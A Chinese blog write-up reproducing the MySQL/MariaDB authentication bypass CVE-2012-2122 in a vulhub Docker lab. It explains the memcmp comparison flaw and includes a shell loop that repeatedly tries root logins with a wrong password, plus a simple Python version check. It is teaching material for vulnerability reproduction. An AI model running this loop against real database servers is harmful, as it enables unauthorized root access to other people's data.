Mysql 身份认证绕过漏洞 CVE-2012-2122

最新推荐文章于 2025-06-07 17:40:08 发布
最新推荐文章于 2025-06-07 17:40:08 发布
阅读量351 收藏 2
点赞数 9
分类专栏: vulhub漏洞复现 文章标签: mysql 数据库 安全 web安全 docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73135216/article/details/148457628
版权

前言:CVE-2012-2122 是一个影响 MySQL 和 MariaDB 的身份验证漏洞,存在于特定版本中

vulhub/mysql/CVE-2012-2122/README.zh-cn.md at master · vulhub/vulhubhttps://github.com/vulhub/vulhub/blob/master/mysql/CVE-2012-2122/README.zh-cn.md

任务一 介绍 CVE-2012-2122

CVE 编号:CVE-2012-2122
披露时间:2012 年 6 月
漏洞类型:认证绕过(Authentication Bypass)
攻击类型:远程攻击,无需认证(Remote / Unauthenticated)
CVSS 评分:10.0(最高危)
攻击者可在不使用正确密码的情况下,通过反复尝试连接,以一定概率获得数据库的访问权限,包括 root 用户权限。
MySQL 在特定版本中,密码认证逻辑依赖 memcmp() 函数来比对密码哈希。但某些平台或编译器(如 GCC 编译的 Linux x86_64)优化后返回值未严格为 0 或非 0,而是返回正负整数

错误的核心是:
if (!memcmp(user_input_hash, stored_hash, 20))
{
    // 登录成功
}

原意是“如果两个哈希相等(返回值为 0)则通过”,但编译优化或符号扩展可能让返回值表现不稳定,导致错误判断

于是只要攻击者足够频繁地发送错误密码,在特定概率(大约 1/256)下,memcmp 返回的非零值可能被误判为 “密码正确”,从而通过认证

任务二 启动环境 

cd mysql/CVE-2012-2122/
docker compose up -d

sudo apt update
sudo apt install mysql-client-core-8.0
//安装 MySQL 客户端

//如果是MariaDB(一般情况不是)
sudo apt install mariadb-client-core

 

任务三 攻击 

for i in `seq 1 1000`; do
  mysql -h 127.0.0.1 -P 3306 -uroot -pwrong_password 2>/dev/null
done

//以下是可能出现的报错
//这是因为 mysql 命令默认尝试通过本地 socket 文件连接 MySQL,但:
复现环境中 MySQL 是跑在容器里,未通过本地 socket 暴露服务。

for i in `seq 1 1000`; do
  mysql -h 127.0.0.1 -P 3306 -uroot -p123 2>/dev/null
done

//改进代码

 

任务四 修复 | 验证 

import subprocess

def check_cve_2012_2122():
    try:
        output = subprocess.check_output("mysql --version", shell=True)
        version = output.decode().strip().split()[4].rstrip(',')
        affected_versions = ['5.1.62', '5.5.23', '5.6.5']  # 示例版本
        if version in affected_versions:
            return "Vulnerable"
        return "Patched"
    except Exception as e:
        return f"Error: {e}"

参考链接

 

 

 

 

 

 

Mysql 身份认证绕过漏洞CVE-2012-2122)复现
weixin_57379923的博客
08-09 1057
这段代码的主要目的是尝试通过 MySQL 客户端连接到指定的数据库服务器,重定向错误输出以保持输出简洁。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。作 者:PeiyuJue。将这些数字赋值给变量。
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4910
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
Mysql 身份认证绕过漏洞CVE-2012-2122
m0_65354386的博客
07-05 321
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,可以在攻击机直接采用shell脚本进行攻击连接数据库漏洞环境使用vulhub搭建,漏洞目录为vulhub/mysql/CVE-2012-2122。可以先进行正常连接看看是否成功: mysql -h IP -uroot -p123456。拉取镜像启动容器:docker-compose up -d。可以看到在经过多次尝试后成功连接数据库,即复现成功。IP为存在此漏洞的kali的IP,即靶机。在靶机搭建环境并启动容器。
MySql-身份认证绕过-CVE-2012-2122
m0_57206390的博客
10-27 481
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库
Mysql 身份认证绕过CVE-2012-2122
bqnagus
10-02 940
Mysql 身份认证绕过CVE-2012-2122)复现
Mysql身份验证绕过 漏洞CVE 2012-2122复现
weixin_72146684的博客
08-25 1410
在一个虚拟机中操作。
Mysql身份认证绕过漏洞CVE-2012-2122)复现
君莫hacker的博客
09-12 2696
0x01 漏洞介绍 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库漏洞编号 CVE-2012-2122 受影响版本 数据库 版本 MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 MySQL 5.1.63, 5.5.24, 5.6.6 0x02
Mysql身份认证绕过漏洞复现(CVE-2012-2122
m0_74887243的博客
03-21 268
Mysql身份认证绕过漏洞复现(CVE-2012-2122
Vulhub复现mysql身份认证绕过漏洞CVE-2012-2122
qq_63101755的博客
07-18 263
Vulhub复现mysql身份认证绕过漏洞CVE-2012-2122
MySQL技术内幕1:内容介绍+MySQL编译使用介绍
qq_40529346的博客
06-06 343
MySQL技术系列文章将从MySQL下载编译,使用到MySQL各组件使用原理+源码分析,采用自底向上,从整体到局部的方式来进行详细分析(从MySQL系统概述到存储管理,再到索引,查询编译,事务,并发,安全,复制和分布式相关内容)。本篇为第一篇,也就是环境准备篇,以此环境为基础来进行后续的介绍。
MYSQL 高级 SQL 技巧
_binlong的博客
06-03 517
这些高级技巧可以根据实际需求灵活组合使用,以解决复杂的 SQL 查询和数据处理问题。以下是一些高级 SQL 技巧,可以帮助优化查询、提高性能并解决复杂的数据处理问题。窗口函数允许在查询结果的行上进行计算,而不会减少行数。动态 SQL 允许在运行时构建和执行 SQL 语句,适用于灵活的查询需求。现代数据库支持 JSON 数据类型和相关函数,方便存储和查询半结构化数据。临时表和公共表表达式(CTE)可以简化复杂查询,提高可读性和性能。创建合适的索引可以显著提高查询性能,尤其是在大表上。
[Linux] MySQL源码编译安装
qq_53232485的博客
06-03 921
本文详细介绍了MySQL 5.7.20源码编译安装过程。主要内容包括:环境包安装(需cmake等工具)、创建mysql系统用户、解压源码包、使用cmake配置编译参数(指定安装路径、字符集等)、多核编译(make -j4)、安装后的权限配置(chown)、修改my.cnf配置文件、设置系统环境变量、初始化数据库以及通过systemd管理MySQL服务。重点强调了采用cmake编译方式,并提供了完整的编译参数和配置模板。
如何排查和解决PHP连接数据库MYSQL失败写锁的问题
cici15874的博客
06-05 1081
通过本文的介绍,您可以系统地了解如何排查和解决PHP连接MySQL数据库失败及写锁问题。通过检查配置、确保服务启动、调整防火墙设置和用户权限,以及识别和解决长时间运行的事务和死锁问题,可以有效地保障应用的稳定运行。
深入剖析MySQL存储架构,索引结构,日志机制,事务提交流程
最新发布
lrj41781196的博客
06-07 1153
frm(旧版本)记录表结构MySQL 8 后使用数据字典替代.frm| SQL层 |↓| 查询执行器 → 调用引擎 | ----> | B+树定位主键页 |↓ ↓| 页进入 Buffer Pool |<----| 磁盘 I/O(如未命中) |↓| 写 Undo Log(支持回滚) |↓| 写 Redo Log(支持恢复) |↓| 修改内存页(Buffer Pool)|↓| 提交事务 COMMIT || - Redo 持久化 || - Binlog 写入 |↓。
基于 SpringBoot+MySQL 的图书商城及用户智能推荐系统的设计与实现
mr_lili_111的博客
06-04 1103
随着互联网技术的普及和电子商务的快速发展,在线图书销售市场呈现出蓬勃发展的态势。根据中国互联网络信息中心 (CNNIC) 发布的第 52 次《中国互联网络发展状况统计报告》显示,截至 2023 年 6 月,我国网络购物用户规模达 8.41 亿,占网民整体的 80.3%。其中,在线图书销售作为网络购物的重要组成部分,市场规模逐年扩大。然而,当前图书商城系统普遍存在用户体验不佳、个性化推荐不足等问题,难以满足用户日益增长的多样化需求。因此,开发一个功能完善、体验优良的在线图书商城系统具有重要的现实意义。
mysql 页的理解和实际分析
master-dragon的专栏
06-07 546
mysql
MySQL 部分重点知识篇
fictionist的博客
06-04 1024
定义:索引是数据库中用于提高数据查询速度的结构,它通过创建额外的数据结构来快速定位和访问表中的数据行。作用:加快数据检索速度,减少磁盘 I/O 操作,提高数据库的整体性能。
数据库管理与高可用-MySQL高可用
2401_85836041的博客
06-07 608
1.1什么是MySQL高可用1.1什么是MySQL高可用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

淡水猫.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值